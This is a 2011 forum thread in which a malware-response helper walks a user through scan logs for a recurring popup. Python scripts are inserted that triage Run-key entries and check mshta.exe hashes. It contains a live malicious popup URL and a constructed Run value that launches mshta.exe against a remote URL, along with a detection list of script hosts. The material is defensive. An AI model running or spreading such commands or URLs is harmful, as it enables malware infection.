Windows Live Communications Platform (Version: 14.0.8117.416)
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0)
Windows Live Messenger (Version: 14.0.8117.0416)
Windows Live Sync (Version: 14.0.8117.416)
Windows Live Writer (Version: 14.0.8117.0416)
Windows Liven asennustyokalu (Version: 14.0.8117.0416)
Windows Liven asennustyokalu (Version: 14.0.8117.416)
Windows Liven sahkoposti (Version: 14.0.8117.0416)
Windows Liven valokuvavalikoima (Version: 14.0.8117.416)
WinFlash (Version: 2.29.0)
WinRAR 4.00 beta 4 (32-bit) (Version: 4.00.4)
Wireless Console 3 (Version: 3.0.15)
YUME MIRU KUSURI (Version: 1.00.0000)
μTorrent (Version: 2.2.0)
沙耶の唄
車輪の国、向日葵の少女 1.0 (Version: 1.0)

========================= Memory info: ===================================

Percentage of memory in use: 73%
Total physical RAM: 4061.02 MB
Available physical RAM: 1058.13 MB
Total Pagefile: 8120.2 MB
Available Pagefile: 3507.03 MB
Total Virtual: 4095.88 MB
Available Virtual: 3997.8 MB

========================= Partitions: =====================================

1 Drive c: (OS) (Fixed) (Total:116.44 GB) (Free:62.76 GB) NTFS
2 Drive d: (DATA) (Fixed) (Total:334.67 GB) (Free:98.49 GB) NTFS
3 Drive f: (C2_DVD) (CDROM) (Total:2.15 GB) (Free:0 GB) UDF
4 Drive g: (ALC2010) (CDROM) (Total:3.65 GB) (Free:0 GB) CDFS

========================= Users: ========================================

Kayttajatilit \\ONOFF-PC

Jarjestelmanvalvoja      onoff                    Vieras                   
Komento on suoritettu.


== End of log == 

MBAM log:
Malwarebytes' Anti-Malware 1.51.1.1800
www.malwarebytes.org

Database version: 7384

Windows 6.1.7600
Internet Explorer 9.0.8112.16421

5.8.2011 16:56:53
mbam-log-2011-08-05 (16-56-53).txt

Scan type: Quick scan
Objects scanned: 176933
Time elapsed: 8 minute(s), 10 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system_boot_b7pH0qhs3YAmzvwoeQt8YqkFbMbt4tvk (Trojan.PMovie) -> Value: system_boot_b7pH0qhs3YAmzvwoeQt8YqkFbMbt4tvk -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

SUPERAntiSpyware log:
SUPERAntiSpyware Scan Log
http://www.superantispyware.com

Generated 08/05/2011 at 06:41 PM

Application Version : 5.0.1108

Core Rules Database Version : 7515
Trace Rules Database Version: 5327

Scan type : Complete Scan
Total Scan Time : 00:59:26

Operating System Information
Windows 7 Home Premium 64-bit (Build 6.01.7600)
UAC On - Limited User

Memory items scanned : 711
Memory threats detected : 0
Registry items scanned : 72405
Registry threats detected : 0
File items scanned : 65984
File threats detected : 25

Adware.Tracking Cookie
C:\Users\onoff\AppData\Roaming\Microsoft\Windows\Cookies\onoff@adform[2].txt
C:\Users\onoff\AppData\Roaming\Microsoft\Windows\Cookies\onoff@apmebf[2].txt
C:\Users\onoff\AppData\Roaming\Microsoft\Windows\Cookies\onoff@atdmt.combing[1].txt
C:\Users\onoff\AppData\Roaming\Microsoft\Windows\Cookies\onoff@bs.serving-sys[2].txt
C:\Users\onoff\AppData\Roaming\Microsoft\Windows\Cookies\onoff@serving-sys[2].txt
alotporn.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
cdn.xxxkinky.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
cdn1.image.freeporn.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
cdn1.pics.mofosex.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
cdn1.static1.pornrabbit.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
h2porn.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
media.mtvnservices.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
media.scanscout.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
media.theonion.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
media1.shufuni.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
msnbcmedia.msn.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
secure-us.imrworldwide.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
static.sunporno.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
vidii.hardsextube.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.alphaporno.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.naiadsystems.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.pornerbros.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.pornhub.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.porntube.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.sunporno.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
GMER log:
GMER 1.0.15.15641 - http://www.gmer.net
Rootkit scan 2011-08-05 19:30:10
Windows 6.1.7600
Running: putd7b40.exe


---- Registry - GMER 1.0.15 ----

Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\0025d3afa434
Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\0025d3afa434@00226564df7f 0x4E 0xC2 0xB8 0x50 ...
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\0025d3afa434 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\0025d3afa434@00226564df7f 0x4E 0xC2 0xB8 0x50 ...

---- EOF - GMER 1.0.15 ----

SystemLook log:
SystemLook 30.07.11 by jpshortstuff
Log created at 19:44 on 05/08/2011 by onoff
Administrator - Elevation successful

========== filefind ==========

Searching for "mshta.exe /md5"
No files found.

========== dir ==========

C:\Windows\system32 - Parameters: "/t5"

---Files---
7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 --ah--- 10240 bytes [04:45 14/07/2009] [21:08 04/08/2011]
7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 --ah--- 10240 bytes [04:45 14/07/2009] [21:08 04/08/2011]

---Folders---
0409 d------ [05:37 14/07/2009]
AdvancedInstallers d------ [03:20 14/07/2009]
ar-SA d------ [03:20 14/07/2009]
bg-BG d------ [03:20 14/07/2009]
Boot d------ [03:20 14/07/2009]
catroot d------ [03:20 14/07/2009]
catroot2 d------ [03:20 14/07/2009]
CodeIntegrity d------ [03:20 14/07/2009]
com d------ [03:20 14/07/2009]
config d------ [03:20 14/07/2009]
cs-CZ d------ [03:20 14/07/2009]
da-DK d------ [03:20 14/07/2009]
de-DE d------ [03:20 14/07/2009]
Dism d------ [03:20 14/07/2009]
drivers d------ [03:20 14/07/2009]
DriverStore d------ [03:20 14/07/2009]
DRVSTORE d----c- [10:26 15/11/2010]
el-GR d------ [03:20 14/07/2009]
en d------ [05:37 14/07/2009]
en-US d------ [03:20 14/07/2009]
es-ES d------ [03:20 14/07/2009]
et-EE d------ [03:20 14/07/2009]
fi d------ [11:03 04/08/2009]
fi-FI d------ [03:20 14/07/2009]
fr-FR d------ [03:20 14/07/2009]
FxsTmp d------ [05:32 14/07/2009]
GroupPolicy d------ [03:20 14/07/2009]
GroupPolicyUsers d------ [03:20 14/07/2009]
he-IL d------ [03:20 14/07/2009]
hr-HR d------ [03:20 14/07/2009]
hu-HU d------ [03:20 14/07/2009]
ias d------ [03:20 14/07/2009]
icsxml d------ [03:20 14/07/2009]
IME d------ [03:20 14/07/2009]
inetsrv d------ [03:20 14/07/2009]
it-IT d------ [03:20 14/07/2009]
ja-JP d------ [03:20 14/07/2009]
ko-KR d------ [03:20 14/07/2009]
log d------ [10:18 15/11/2010]
LogFiles d------ [03:20 14/07/2009]
lt-LT d------ [03:20 14/07/2009]
lv-LV d------ [03:20 14/07/2009]
manifeststore d------ [03:20 14/07/2009]
Microsoft d---s-- [04:45 14/07/2009]
migration d------ [03:20 14/07/2009]
migwiz d------ [03:20 14/07/2009]
Msdtc d------ [03:20 14/07/2009]
MUI d------ [03:20 14/07/2009]
nb-NO d------ [03:20 14/07/2009]
NDF d------ [03:20 14/07/2009]
NetworkList d------ [03:20 14/07/2009]
nl-NL d------ [03:20 14/07/2009]
OEM d------ [05:20 29/07/2009]
oobe d------ [03:20 14/07/2009]
pl-PL d------ [03:20 14/07/2009]
Printing_Admin_Scripts d------ [05:37 14/07/2009]
pt-BR d------ [03:20 14/07/2009]
pt-PT d------ [03:20 14/07/2009]
ras d------ [03:20 14/07/2009]
Recovery d------ [03:20 14/07/2009]
restore d------ [05:32 14/07/2009]
ro-RO d------ [03:20 14/07/2009]
ru-RU d------ [03:20 14/07/2009]
Setup d------ [03:20 14/07/2009]
sk-SK d------ [03:20 14/07/2009]
sl-SI d------ [03:20 14/07/2009]
slmgr d------ [05:37 14/07/2009]
SMI d------ [03:20 14/07/2009]
Speech d------ [03:20 14/07/2009]
spool d------ [03:20 14/07/2009]
spp d------ [03:20 14/07/2009]
sppui d------ [03:20 14/07/2009]
sr-Latn-CS d------ [03:20 14/07/2009]
SRSLabs d------ [11:35 28/03/2010]
sv-SE d------ [03:20 14/07/2009]
sysprep d------ [03:20 14/07/2009]
Tasks d------ [03:20 14/07/2009]
th-TH d------ [03:20 14/07/2009]
tr-TR d------ [03:20 14/07/2009]
uk-UA d------ [03:20 14/07/2009]
Wat d------ [07:41 17/11/2010]
wbem d------ [03:20 14/07/2009]
WCN d------ [05:37 14/07/2009]
wdi d------ [03:20 14/07/2009]
wfp d------ [03:20 14/07/2009]
WinBioDatabase d------ [05:32 14/07/2009]
WinBioPlugIns d------ [05:32 14/07/2009]
WindowsPowerShell d------ [05:32 14/07/2009]
winevt d------ [03:20 14/07/2009]
winrm d------ [05:37 14/07/2009]
zh-CN d------ [03:20 14/07/2009]
zh-HK d------ [03:20 14/07/2009]
zh-TW d------ [03:20 14/07/2009]

C:\Windows\syswow64 - Parameters: "/t5"

---Files---
None found.

---Folders---
0409 d------ [05:37 14/07/2009]
AdvancedInstallers d------ [03:20 14/07/2009]
ar-SA d------ [03:20 14/07/2009]
ASUS_UL_Series_Screensaver dir d------ [11:41 28/03/2010]
bg-BG d------ [03:20 14/07/2009]
catroot d------ [03:20 14/07/2009]
catroot2 d------ [03:20 14/07/2009]
com d------ [03:20 14/07/2009]
config d------ [03:20 14/07/2009]
cs-CZ d------ [03:20 14/07/2009]
da-DK d------ [03:20 14/07/2009]
de-DE d------ [03:20 14/07/2009]
directx d------ [14:57 21/01/2011]
Dism d------ [03:20 14/07/2009]
drivers d------ [03:20 14/07/2009]
DriverStore d------ [03:20 14/07/2009]
el-GR d------ [03:20 14/07/2009]
en d------ [05:37 14/07/2009]
en-US d------ [03:20 14/07/2009]
es-ES d------ [03:20 14/07/2009]
et-EE d------ [03:20 14/07/2009]
fi d------ [11:03 04/08/2009]
fi-FI d------ [03:20 14/07/2009]
fr-FR d------ [03:20 14/07/2009]
FxsTmp d------ [05:32 14/07/2009]
GroupPolicy d------ [03:20 14/07/2009]
GroupPolicyUsers d------ [03:20 14/07/2009]
he-IL d------ [03:20 14/07/2009]
hr-HR d------ [03:20 14/07/2009]
hu-HU d------ [03:20 14/07/2009]
icsxml d------ [03:20 14/07/2009]
IME d------ [03:20 14/07/2009]
inetsrv d------ [03:20 14/07/2009]
InstallShield d------ [03:20 14/07/2009]
it-IT d------ [03:20 14/07/2009]
ja-JP d------ [03:20 14/07/2009]
ko-KR d------ [03:20 14/07/2009]
LogFiles d------ [05:32 14/07/2009]
lt-LT d------ [03:20 14/07/2009]
lv-LV d------ [03:20 14/07/2009]
Macromed d------ [11:31 28/03/2010]
manifeststore d------ [03:20 14/07/2009]
migration d------ [03:20 14/07/2009]
migwiz d------ [03:20 14/07/2009]
Msdtc d------ [03:20 14/07/2009]
MUI d------ [03:20 14/07/2009]
nb-NO d------ [03:20 14/07/2009]
NDF d------ [03:20 14/07/2009]
NetworkList d------ [03:20 14/07/2009]
nl-NL d------ [03:20 14/07/2009]
oobe d------ [03:20 14/07/2009]
pl-PL d------ [03:20 14/07/2009]
Printing_Admin_Scripts d------ [05:37 14/07/2009]
pt-BR d------ [03:20 14/07/2009]
pt-PT d------ [03:20 14/07/2009]
ras d------ [03:20 14/07/2009]
Recovery d------ [03:20 14/07/2009]
restore d------ [05:32 14/07/2009]
ro-RO d------ [03:20 14/07/2009]
RTCOM d------ [11:35 28/03/2010]
ru-RU d------ [03:20 14/07/2009]
Setup d------ [03:20 14/07/2009]
sk-SK d------ [03:20 14/07/2009]
sl-SI d------ [03:20 14/07/2009]
slmgr d------ [05:37 14/07/2009]
Speech d------ [03:20 14/07/2009]
spp d------ [03:20 14/07/2009]
sppui d------ [03:20 14/07/2009]
sr-Latn-CS d------ [03:20 14/07/2009]
sv-SE d------ [03:20 14/07/2009]
sysprep d------ [05:37 14/07/2009]
Tasks d------ [03:20 14/07/2009]
th-TH d------ [03:20 14/07/2009]
tr-TR d------ [03:20 14/07/2009]
uk-UA d------ [03:20 14/07/2009]
Wat d------ [07:41 17/11/2010]
wbem d------ [03:20 14/07/2009]
WCN d------ [05:37 14/07/2009]
wdi d------ [03:20 14/07/2009]
WindowsPowerShell d------ [05:32 14/07/2009]
winrm d------ [05:37 14/07/2009]
XPSViewer d------ [10:52 04/08/2009]
zh-CN d------ [03:20 14/07/2009]
zh-HK d------ [03:20 14/07/2009]
zh-TW d------ [03:20 14/07/2009]

-= EOF =-

SuperAntiSpyware didn't close my firefox while running its scan, and by default GMER had only C:\ checked for scanned files - is either of these a problem?

My computer is running fine. The VISUAL popup went away when I closed the window while not connected to the internet, but it (white box, same name) still shows up when I alt tab and in my task manager, so can't say the problem really went anywhere yet.

Should I try terminating the popup from task manager or restarting?
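The Malwarebytes hit in the log above is the part of this thread worth understanding as a defender: the persistence was a value under HKCU\...\Run named system_boot_ followed by a random-looking token, and essentially the same token later turns up as the cccid parameter of the popup's URL. Run values that start a script host such as mshta.exe and point it at a remote URL are the first thing to look for when a popup keeps coming back. The following Python triage routine is an added example, not part of this thread and not code from Malwarebytes, SystemLook or any other tool used here. It runs over a constructed list of Run values: the Adobe and UpdateCheck entries are invented, the command line attached to the system_boot_ name is invented too (the thread never shows that value's data), and the URL uses a reserved .example domain.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of HKCU\...\Run values as (value name, value data). The second
# entry reuses the value name Malwarebytes reported in this thread; its command line
# is invented (the thread never shows the value's data), and the URL is a reserved
# .example domain, not the real one from the popup.
SAMPLE_RUN_VALUES: List[Tuple[str, str]] = [
    ("Adobe Reader Speed Launcher",
     r'"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"'),
    ("system_boot_b7pH0qhs3YAmzvwoeQt8YqkFbMbt4tvk",
     r"mshta.exe http://malicious.example/reg2.php?cccid=b7pH0qhs3YAmzvwoeQt8YqkFbMbt4tvk"),
    ("UpdateCheck",
     r'wscript.exe //B "C:\Users\onoff\AppData\Roaming\update.vbs"'),
]

# Windows script/host binaries that run whatever content they are pointed at; a Run
# value that starts one of these is unusual for ordinary software and worth a closer look.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe",
                "regsvr32.exe", "powershell.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(?:hta|js|jse|vbs|vbe|wsf|ps1)\b", re.IGNORECASE)
RANDOM_TOKEN_RE = re.compile(r"[A-Za-z0-9]{16,}")


def executable_name(command: str) -> str:
    """Lower-cased basename of the program a Run command starts, honouring a quoted
    first argument (paths containing spaces)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        exe = command[1:end] if end != -1 else command[1:]
    else:
        exe = command.split(None, 1)[0] if command else ""
    return exe.replace("\\", "/").rsplit("/", 1)[-1].lower()


def looks_random(name: str) -> bool:
    """Heuristic for machine-generated value names: a run of 16+ alphanumerics that
    mixes upper case, lower case and digits (like the suffix of system_boot_b7pH0q...).
    Long CamelCase names without digits, e.g. GoogleUpdateTaskMachineCore, do not trip it."""
    for token in RANDOM_TOKEN_RE.findall(name):
        if (any(c.isupper() for c in token) and any(c.islower() for c in token)
                and any(c.isdigit() for c in token)):
            return True
    return False


def triage_run_value(name: str, command: str) -> List[str]:
    """Return the reasons a Run value deserves attention; an empty list means nothing flagged."""
    reasons = []
    exe = executable_name(command)
    if exe in SCRIPT_HOSTS:
        reasons.append(f"launches script host {exe}")
        if URL_RE.search(command):
            reasons.append("argument is a remote URL")
        if SCRIPT_EXT_RE.search(command):
            reasons.append("argument is a script file")
    if looks_random(name):
        reasons.append("value name contains a random-looking token")
    return reasons


def triage_all(values: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map each flagged value name to its reasons; values with nothing flagged are omitted."""
    findings = {}
    for name, command in values:
        reasons = triage_run_value(name, command)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage_all(SAMPLE_RUN_VALUES).items():
        print(f"{name}\n  " + "\n  ".join(reasons))
```

On a real machine the same routine would be fed the values read from both the HKCU and HKLM Run/RunOnce keys (and, given DaFe's worry in the first post, the actions of scheduled tasks, which can carry exactly the same kind of command line). A flagged entry is a lead, not a verdict: a legitimate rundll32.exe entry is common, whereas a script host handed a remote URL is the pattern behind this thread's popup.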

#4 jntkwx
  • Malware Response Team
  • 4,339 posts
  • Gender:Male
  • Location:New England, U.S.A.

Posted 05 August 2011 - 12:17 PM

SuperAntiSpyware didn't close my firefox while running its scan, and by default GMER had only C:\ checked for scanned files - is either of these a problem?

My computer is running fine. The VISUAL popup went away when I closed the window while not connected to the internet, but it (white box, same name) still shows up when I alt tab and in my task manager, so can't say the problem really went anywhere yet.

Should I try terminating the popup from task manager or restarting?


1. I don't think either SuperAntiSpyware not closing Firefox or GMER only checking C:\ are a problem.

2. If you open the Task Manager, what is listed under the Applications tab?

3. Rerun SystemLook
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :filefind
    mshta.exe
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
Regards,
Jason

 

Simple and easy ways to keep your computer safe and secure on the Internet

If I am helping you and have not returned in 48 hours, please feel free to send me a PM with a link to the topic.
My help is free... however, if you wish to show appreciation and support me personally fighting against malware, please consider a donation: btn_donate_SM.gif


#5 DaFe
  • Topic Starter
  • Members
  • 10 posts

Posted 05 August 2011 - 12:43 PM

Under the Applications tab (that's the first tab, I presume? Running Windows in my language, so double-checking to make sure):
Firefox 3x - 2 windows + downloads window
the popup named as: http://pekci39u.com/reg2.php?cccid=b7pH0qhs3YAmzvwoeQt8YqkFbMbt4vk

Below the new log you asked:
SystemLook 30.07.11 by jpshortstuff
Log created at 20:42 on 05/08/2011 by onoff
Administrator - Elevation successful

========== filefind ==========

Searching for "mshta.exe"
C:\Windows\System32\mshta.exe --a---- 12288 bytes [11:22 01/05/2011] [11:22 01/05/2011] E49EC15EFFC9F01298093DBD7E0A31AF
C:\Windows\SysWOW64\mshta.exe --a---- 11776 bytes [11:22 01/05/2011] [11:22 01/05/2011] 061CBB1058A10C0875D18CAFF835AE97
C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_8.0.7600.16385_none_d009281f9a108e04\mshta.exe --a---- 43520 bytes [23:58 13/07/2009] [01:39 14/07/2009] 45B5032CD23466294C0A381BFC6E8C65
C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_9.4.8112.16421_none_cdf82d82dc01518b\mshta.exe --a---- 12288 bytes [11:22 01/05/2011] [11:22 01/05/2011] E49EC15EFFC9F01298093DBD7E0A31AF
C:\Windows\winsxs\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_8.0.7600.16385_none_da5dd271ce714fff\mshta.exe --a---- 47104 bytes [23:42 13/07/2009] [01:14 14/07/2009] E2FE656A79D8F4C4FD70201E7423BDA0
C:\Windows\winsxs\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_9.4.8112.16421_none_d84cd7d510621386\mshta.exe --a---- 11776 bytes [11:22 01/05/2011] [11:22 01/05/2011] 061CBB1058A10C0875D18CAFF835AE97

-= EOF =-

Edited by DaFe, 05 August 2011 - 12:44 PM.


#6 jntkwx
  • Malware Response Team
  • 4,339 posts
  • Gender:Male
  • Location:New England, U.S.A.

Posted 05 August 2011 - 12:48 PM

Under applications tab (that's the first tab, I presume? Running windows in my language, so doublechecking to make sure):
Firefox 3x - 2 windows + downloads window
the popup named as: http://pekci39u.com/reg2.php?cccid=b7pH0qhs3YAmzvwoeQt8YqkFbMbt4vk


Yes, the Applications tab is the first tab.

If you right click the pop-up name, and select Go To Process (the last item listed in the dropdown menu), it will switch to the Processes tab (the second tab). Please tell me the name of the highlighted file (this is the process associated with the pop-up).
Regards,
Jason

 



#7 DaFe
  • Topic Starter
  • Members
  • 10 posts

Posted 05 August 2011 - 01:14 PM

That would be the mshta.exe *32.

#8 jntkwx
  • Malware Response Team
  • 4,339 posts
  • Gender:Male
  • Location:New England, U.S.A.

Posted 05 August 2011 - 01:40 PM

That's odd. The actual mshta.exe file appears to be the correct file.

Rerun SystemLook
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :process
    mshta.exe
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
Regards,
Jason

 


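Jason's "appears to be the correct file" reading rests on the filefind log DaFe posted in #5: the System32 and SysWOW64 copies of mshta.exe carry the same MD5s and sizes as the 9.4.8112.16421 amd64 and wow64 copies in the winsxs component store, so the binaries on disk are the ones Windows servicing installed. The following Python script is an added example, not part of this thread and not SystemLook's code: it parses those SystemLook filefind lines (copied from DaFe's log) and checks every live copy against the component-store copies. The TAMPERED_LOG variant is constructed here to show what a replaced binary would look like; nothing like it appears in the real log.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# SystemLook ":filefind mshta.exe" output, copied from DaFe's log in post #5 of this thread.
FILEFIND_LOG = r"""
SystemLook 30.07.11 by jpshortstuff
Log created at 20:42 on 05/08/2011 by onoff
Administrator - Elevation successful

========== filefind ==========

Searching for "mshta.exe"
C:\Windows\System32\mshta.exe --a---- 12288 bytes [11:22 01/05/2011] [11:22 01/05/2011] E49EC15EFFC9F01298093DBD7E0A31AF
C:\Windows\SysWOW64\mshta.exe --a---- 11776 bytes [11:22 01/05/2011] [11:22 01/05/2011] 061CBB1058A10C0875D18CAFF835AE97
C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_8.0.7600.16385_none_d009281f9a108e04\mshta.exe --a---- 43520 bytes [23:58 13/07/2009] [01:39 14/07/2009] 45B5032CD23466294C0A381BFC6E8C65
C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_9.4.8112.16421_none_cdf82d82dc01518b\mshta.exe --a---- 12288 bytes [11:22 01/05/2011] [11:22 01/05/2011] E49EC15EFFC9F01298093DBD7E0A31AF
C:\Windows\winsxs\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_8.0.7600.16385_none_da5dd271ce714fff\mshta.exe --a---- 47104 bytes [23:42 13/07/2009] [01:14 14/07/2009] E2FE656A79D8F4C4FD70201E7423BDA0
C:\Windows\winsxs\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_9.4.8112.16421_none_d84cd7d510621386\mshta.exe --a---- 11776 bytes [11:22 01/05/2011] [11:22 01/05/2011] 061CBB1058A10C0875D18CAFF835AE97

-= EOF =-
"""

# One SystemLook filefind result line: path, 7 attribute flags, size, created, modified, MD5.
LINE_RE = re.compile(
    r"^(?P<path>[A-Za-z]:\\.+?)\s+(?P<attrs>[-a-z]{7})\s+(?P<size>\d+) bytes"
    r"\s+\[(?P<created>[^\]]+)\]\s+\[(?P<modified>[^\]]+)\]\s+(?P<md5>[0-9A-Fa-f]{32})\s*$"
)
# Component-store directory names encode architecture, component, public key token and version.
SXS_RE = re.compile(
    r"\\winsxs\\(?P<arch>[a-z0-9]+)_(?P<component>[a-z0-9.-]+)_(?P<token>[0-9a-f]{16})"
    r"_(?P<version>\d+(?:\.\d+){3})_",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class FileEntry:
    path: str
    size: int
    md5: str
    arch: Optional[str]      # set only for component-store (winsxs) copies
    version: Optional[str]   # likewise

    @property
    def in_component_store(self) -> bool:
        return self.arch is not None


def parse_filefind(log: str) -> List[FileEntry]:
    """Extract file result lines from a SystemLook filefind log; other lines are ignored."""
    entries = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        sxs = SXS_RE.search(m["path"])
        entries.append(FileEntry(
            path=m["path"],
            size=int(m["size"]),
            md5=m["md5"].upper(),
            arch=sxs["arch"].lower() if sxs else None,
            version=sxs["version"] if sxs else None,
        ))
    return entries


def check_against_component_store(entries: List[FileEntry]) -> Dict[str, Tuple[bool, Optional[str]]]:
    """For each live copy (outside winsxs) report whether its MD5 and size match a
    component-store copy and, if so, which architecture/version that copy is."""
    store = {(e.md5, e.size): e for e in entries if e.in_component_store}
    verdicts = {}
    for e in entries:
        if e.in_component_store:
            continue
        match = store.get((e.md5, e.size))
        verdicts[e.path] = (True, f"{match.arch} {match.version}") if match else (False, None)
    return verdicts


def with_tampered_live_copy(log: str, live_path: str, fake_md5: str) -> str:
    """Constructed variant of a log: overwrite the MD5 of one live copy to simulate a
    binary replaced on disk (nothing like this appears in DaFe's real log)."""
    lines = []
    for line in log.splitlines():
        if line.startswith(live_path + " "):
            line = line[:-32] + fake_md5
        lines.append(line)
    return "\n".join(lines)


TAMPERED_LOG = with_tampered_live_copy(FILEFIND_LOG, r"C:\Windows\SysWOW64\mshta.exe", "0" * 32)

if __name__ == "__main__":
    for label, log in (("DaFe's log", FILEFIND_LOG), ("constructed tampered log", TAMPERED_LOG)):
        print(f"== {label} ==")
        for path, (ok, which) in check_against_component_store(parse_filefind(log)).items():
            print(f"{'OK      ' if ok else 'NO MATCH'} {path} -> {which or 'no component-store copy with this hash'}")
```

A live copy whose hash matches no winsxs entry is not proof of tampering (the log may simply not list the servicing version it came from), but it is the result that would justify the deeper per-file checks Jason ran next. The converse is the thread's real lesson: a pristine mshta.exe is exactly what the popup was running, because the malicious part was the Run value Malwarebytes quarantined earlier, whose name carries the same cccid token as the popup's URL, not the host binary itself.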

#9 DaFe
  • Topic Starter
  • Members
  • 10 posts

Posted 05 August 2011 - 02:11 PM

Okay, reran it. Log:
SystemLook 30.07.11 by jpshortstuff
Log created at 21:47 on 05/08/2011 by onoff
Administrator - Elevation successful

========== process ==========

mshta.exe - 1 handle(s) returned.
File path: C:\Windows\SysWOW64\mshta.exe
MD5: 061CBB1058A10C0875D18CAFF835AE97
Modules:
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SYSTEM32\wow64.dll
C:\Windows\SYSTEM32\wow64win.dll
C:\Windows\SYSTEM32\wow64cpu.dll

-= EOF =-

Could a restart or ending the task via task manager help now? Earlier it used to come back whenever closed, but now I cannot close the actual "window" anymore as it's only visible in task manager and alt tab menu, screenshots here: http://imageshack.us/g/231/popups.png/
What I'm getting at is - one of the earlier checks did find and quarantine a single trojan (+bunch of tracking cookies) - could it be that if that was the source and it was deleted while the popup was still open, it caused the ad to freeze when I closed it for the GMER scan?

#10 jntkwx
  • Malware Response Team
  • 4,339 posts
  • Gender:Male
  • Location:New England, U.S.A.

Posted 05 August 2011 - 02:18 PM

